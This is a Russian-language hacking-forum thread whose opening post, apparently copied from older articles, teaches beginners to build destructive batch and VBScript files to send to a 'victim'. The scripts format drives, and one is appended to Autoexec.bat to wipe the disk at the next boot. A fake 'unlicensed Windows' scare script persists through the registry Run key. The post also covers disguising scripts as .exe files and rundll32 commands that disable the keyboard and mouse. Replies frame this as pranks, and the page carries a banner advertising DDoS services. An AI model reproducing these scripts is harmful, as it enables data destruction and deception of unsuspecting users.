Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


Как навредить с маленьким количеством знаний?


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 7

#1
Alekzzzander

Alekzzzander

    Бит

  • Members
  • 34 сообщений
Сейчас я объясню Вам примерно как можно навредить человеку, с минимальными знаниями в этой тематике.
Делать всё можно в блокноте, но сохраняя всё в форматы *.vbs или *.bat
Для упращения работы с ними были придуманы генераторы вирусов, в которых Вы просто отмечаете что Вам требуеться и нажимаете Сохранить (или Созадть) и получаете уже готовый файлик, который отправив жертве вы можете не плохо напортачить. (один из таких генераторов называеться Generator_KUZJA)
Но так как многих может насторожить файл системного вида, но и тут уже давно придуман выход! существует софт, который конвертирует файлы из *.vbs или *.bat в *.exe они называються *формат_файла*2exe или *формат_файла*toexe ... вместо *формат_файла* пишем формат нашего фалй(*.vbs или *.bat)
-----------------------------
Что такое *.bat фалйы? Как они работают и что я могу сам сделать?
Для начала давай разбёремся в том, что же такое batch'и. Прежде всего - это пакетные дос файлы, которые содержат в себе в ascii виде набор досовских команд. По-русски говоря, bat файл содержит в себе скрипт, интерпритатором служит command.com.
Поясняю: после прочтения этой статьи, ты сможешь писать проги, которые удаляют системные файлы, форматируют диски и тд. Главное, тебе для этого понадобится только блокнот и прямые руки, никаких компиляторов и дебагеров не требуется (бачи не такие примитивные, как тебе кажется - есть вирусы\генераторы, на них написанные).
И ещё. Я не буду описывать все возможные флаги(параметры) каждой команды, только наиболее полезные.
Ну чё, готов? Поехали!
Простые команды:

echo off - запрещение вывода на экран исполняемых команд (on - вкл.)
deltree /y %файл% - удалить файл (/y означает "удалить без вопросов"). Кста, в НТ работает тока del (флаг /y не нужен).
copy %путь\файл% %куда\файл% - копировать файло
mkdir %название_диры% - создать директорию
echo %текст% - вывести текст на экран
echo %текст% > %путь\файл% - создать файл и вписать в него текст
echo %текст% >> %путь\файл% - добавить текст в уже существующий файл
if exist %путь\файл% %команда% - если существует файл, выполнить команду
attrib %атрибут% %путь\файл% - поставить\убрать атрибуты файлу (+-h скрытый, +-s системный, +-r только чтение)
start %путь\файл% - запустить файло
cls - отчистить экран
pause - выводит сообщение "Нажмите любую кнопку..."
label %новая_метка% - поставить новую метку системного диска (диск С)
format %диск%: /q - быстрое форматирование диска :) Несколько секунд
ren %путь\файл% %новое_название_файла% - переименовать файло
goto %метка%
...
...
...
:%метка% - перескoчить с одного места кода на метку.

Фишки, хитрости:
1: choice /N /T:y,%сек% > nul - типа таймера (на n секунд задерживает выполнение последующих команд).

2: %команда% > nul - запрещение вывода на экран самой команды и результата её действия (полезно при команде "copy"). Пример: copy c:\some.exe %windir%\some.exe > nul

3: regedit /s %путь\файл.reg% - добавить ключи в реестр из файла, без вопросов

4: start /m /w %путь\файл% - запустить файло в свёрнутом окне.

5: слышал про файл Autoexec.bat? Знаешь, что он грузится вместе с компом? Наверное, да. Так вот, он имеет расширение BAT. На что я намекаю? На то, что ты можешь в него прописать строчку, к примеру, "format C: /q" (прописывается она вот так: echo format C: /q >> c:\Autoexec.bat) и во время перезагрузки у жертвы отформатируется диск С.
Это я к тому, что любой скрипт, вставленный в этот файл, будет выполнен при загрузке компа. Также можешь создать в каталоге с виндой файл winstart.bat. Он также запуститья виндусом.

6: это относиться как раз к фишке с Autoexec'ом. К примеру, если ты положишь в каталог windows\command файл к примеру "load.bat" (наверное с плохим содержанием), это файлу из autoexec'a с вероятностью в 90% можно будет запустить строчкой "load". И это ещё отстой..Ты сможешь загружать это файло такой строчкой: "load keybrd32.sys,,cyr\lat" или такой: "load VideoAdapter32.drv -- By windows setup --". Врятли такие строчки рискнёт кто-нибудь удалять и твоё файло без трабл загрузится..=)

7: if exist c:\Progra~1 set drv=c:
if exist d:\Progra~1 set drv=d:
if exist d:\Progra~1 set drv=e:
После выполнения этого скрипта в переменной %drv% будет прописан диск с Виндой, с Program Files'ами.

8: в переменной %windir% хранится каталог с виндусом в таком виде: диск:\название_каталога. Пример: copy c:\some.exe %windir%\some.exe

9: batch скрипты не любят длинные, либо состоящие из двух слов, названия. Длинные урезаются до 6-ти букв (после них должно стоять "~1", к примеру "Program Files -> Progra~1"). Пробелы он просто убирает (The Bat -> TheBat~1).
Это я к тому, что в бачах обращайся к файлам по их досовским названиям. Пример: copy c:\some.exe c:\Progra~1\some.exe (копируется файл в папку Program Files).

10: echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("твой_текст"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js

Этот скрипт выводит на экран _Виндовое_ окошко (по средствам Java Script) с твоим сообщением и кнопкой ОК.
Ну вот наверно и всё! Здесь я умолчал о переменных, циклах и создании меню в batch'ах, так как это довольно объёмные темы. Следующая статья будет как раз посвещена им.
                                                Автор: D4rkGr3y


-----------------------------
Что такое *.vbs фалйы? Как они работают и что я могу сам сделать?
Расшифровываеться VBS как Visual Basic Script
А принцип работы:
  Нельзя, конечно, данную вкладку назвать руководством по программированию VBS, это далеко не так, просто иногда vbs скрипт может существенно облегчить некоторые задачи. А администрирование крупных сетей без него просто не обходится. Нам же просто необходим он для решения простейших задач и для создания некоторых шуток.

  Файл скрипта представляет собой текстовый документ с расширением .vbs Он может состоять даже из одной строки. Например, чтобы вызвать появление такого сообщения:

Изображение

необходимо просто вписать в файл следующую команду: msgbox "Передохни, Kitkat отломи. Выключи компьютер, выдерни из розетки шнур, возьми системный блок и выбрось его - сходи на дискотеку, выпей пива и забудь о дяде Билле.",48, "Хватит работать".

  Msgbox - это одна из процедур vbscript. Цифра 48 - это одно из значений для вывода кнопок и значков в окне диалога.Ниже дана таблица с остальными значениями. 0 Выводит кнопку ОК
1 Выводит кнопки ОК и Отмена
2 Выводит кнопки Стоп, Повтор, Пропустить
3 Выводит кнопки Да, Нет, Отмена
4 Выводит кнопки Да и Нет
5 Выводит кнопки Повтор и Отмена
16 Выводит значок "сообщение о критической ситуации"
32 Выводит значок "Вопросительный знак"
48 Выводит значок "Восклицательный знак"
64 Выводит значок "Информационное сообщение"


Для чего это мы здесь дали? Просто для демонстрации.

Итак, возращаясь к командам Rundll32, описанным здесь, можно сказать, что VBS в совокупности с этими самыми процедурами является самым лучшим способом "пошутить". Итак. Задача: нам надо после 5 числа месяца запутить сообщение, которое бы сообщало, что Windows, установленная на компьютере нелицензионная и после перезагрузки диск будет отформатирован. Затем компьютер бы выключался.

Решение.

Используем условный оператор IF для запуска после определенного числа.  

if Day(now)>5 Then

(процедура)

End If


Теперь необходимо вписать основные команды, которые бы выполнились после 5-го числа. Программка может иметь такой вид: Sub Program(Oops, Wait)

Set WshShell=WScript.CreateObject("WScript.Shell")

X=WshShell.Run(Oops,Wait)

End Sub

msgbox "windows установила, что вы используете нелицензионную копию этой ОС, сейчас компьютер будет перезагружен и диск отформатирован.",16, "Внимание!".

Call Program("rundll32 shell32,SHExitWindowsEx -1", True)


В инструкции "Call" и дана та самая команда RunDll32. Здесь можно написать абсолютно все, что хотелось бы выполнить, все, что можно написать в пункте "Run" стартового меню. К тому же вызовов инструкции Call может быть неограниченно. А можно и цикл создать. Теперь необходимо сделать так, чтобы наш скрипт запускался каждый раз при загрузке компьютера. Для этого добавляем 2 строчки в самой начало скрипта.   Set WSHShell=WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" , "%windir%\hack.vbs"


Думаю, что все понятно в реестр, в автозагрузку прописывается наш файл hack.vbs и ждет своего часа. А представить реакцию юзера, увидившего это послание на уроке информатике или у себя дома, не трудно!

Команды Rundll32 и возможность их использования

  Все мы знаем, что все процессы во время работы запускаются и останавливаются с помощью комманд, которые ОС постоянно выполняет. Но сейчас это уже не так актуально и интересно, но несмотря на это нами было получено несколько писем с просьбой дать описание всех команд Rundll32 в Windows, что мы и делаем.Команда Действие
rundll32 user.exe,ExitWindows Завершение работы Windows
rundll32 user.exe,ExitWindowsExec Перезагрузка Windows
rundll32 shell32.dll,SHExitWindowsEx Завершение сеанса работы Windows
rundll32 user,RepaintScreen Обновить экран (F5)
rundll32 user,WNetDisconnectDialog Вызвать окно "Отключение сетевого диска"
rundll32 user,disableoemlayer Провоцировать сбой системы (черный экран и мигающий курсор)
rundll32 user,WNetConnectDialog Вызвать окно "Подключение сетевого диска"
rundll32 user,SetCursorPos Переместить курсор мыши в левый верхний угол
rundll32 diskcopy,DiskCopyRunDll Вызвать окно "Копирование диска"
rundll32 shell,ShellExecute Открыть корневой каталог в проводнике
rundll32shell32,OpenAs_RunDLL файл.расширение Открыть диалоговое окно "Открыть с помощью..." и связать указанную программу с файлами с расширением, указанном в команде
rundll32 shell32,SHFormatDrive Вызвать окно форматирования диска
rundll32 shell32,ShellAboutA Показать окно About Windows
rundll32 shell32,Control_RunDLL Открыть Панель управления
rundll32 shell32,Control_RunDLL set.cpl Вызвать определенное окно на Панели управления. Вместо set.cpl в команде нужно вписать необходимый файл с расширением .cpl.
rundll32 krnl386.exe,exitkernel Выход из Windows без любых сообщений/вопросов
rundll32 user,SwapMouseButton Поменять местами клавиши мыши (работает только в одну сторону)
rundll32 keyboard,disable Отключить клавиатуру
rundll32 mouse,disable Отключить мышь
rundll32 user,TileChildWindows Расположить все несвернутые окна по вертикали
rundll32 user,CascadeChildWindows Расположить все несвернутые окна каскадом
rundll32 msprint2.dll,RUNDLL_PrintTestPage Выбрать принтер и распечатать пробную страницу
rundll32 user,SetCaretBlinkTime Сильно увеличить частоту мигания курсора
rundll32 user, SetDoubleClickTime Изменить скорость двойного щелчка мыши
rundll32 rnaui.dll,RnaWizard Вызвать диалог "Установка связи"
rundll32 sysdm.cpl,InstallDevice_Rundll Установить оборудование
rundll32 shell32,SHExitWindowsEx 0 Перезагрузить Windows без перезагрузки компьютера
rundll32 shell32,SHExitWindowsEx 1 Завершить работу Windows
rundll32 shell32,SHExitWindowsEx 2 Перезагрузить компьютер


К сожалению, большинство этих команд не работают в Windows XP, но тем не менее, стоит их изучить, дабы ускорить свою работу в Windows 9x.

Самый простой способ - это создать ярлык на рабочем столеи в строке адреса файла вписать одну из команд. После чего назначить горячую клавишу - таким образом за пару нажатий можно сделать то, для чего бы требовалось не одна минута.
]]>http://www.winall.ru]]> ©

так же для можно использовать команды реестра, для этого Вы можете воспользоваться помошником:
Скрытый текст


#2
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Это скорее в статьи ;) Перенес.

#3
FreeCat

FreeCat

    Invisible Admin

  • root
  • PipPipPipPipPip
  • 1236 сообщений
Alekzzzander

Цитата

стоит их изучить, дабы ускорить свою работу в Windows 9x.
А ты хоть в какой системе работаешь)))???

#4
Alekzzzander

Alekzzzander

    Бит

  • Members
  • 34 сообщений
лично я уже 2))но эти статьи писал не я)копирайты стоят =)
но я думаю что и для ХР и висты такие скрипты (если грамотно собрать) потянут

#5
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Это помоему не вред, а просто шутки ;)

#6
Alekzzzander

Alekzzzander

    Бит

  • Members
  • 34 сообщений
если грамотно написать то и исправлять будет сложно, а если исправить сложно то вред :biggrin:

#7
Urbis

Urbis

    EternalStone

  • Moderator
  • PipPip
  • 177 сообщений
Можно через Дельфи работать с rundll32 и создать мелкую программу которая будет пакостить юзеру =) я как то одну такую писал с возможностью форматирования диска...причем программа вежливо так как бы невзначай вызывает окошко хочешь форматнуть винду жми сюда ))) а юзер думает че я лох чтоли это все развод полный и жмет на кнопку Ок. =) вот тогда и вред будет.
Цитата

#8
Zakladka

Zakladka

    Бит

  • Members
  • 21 сообщений
чёто меня больше улыбнуло)


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных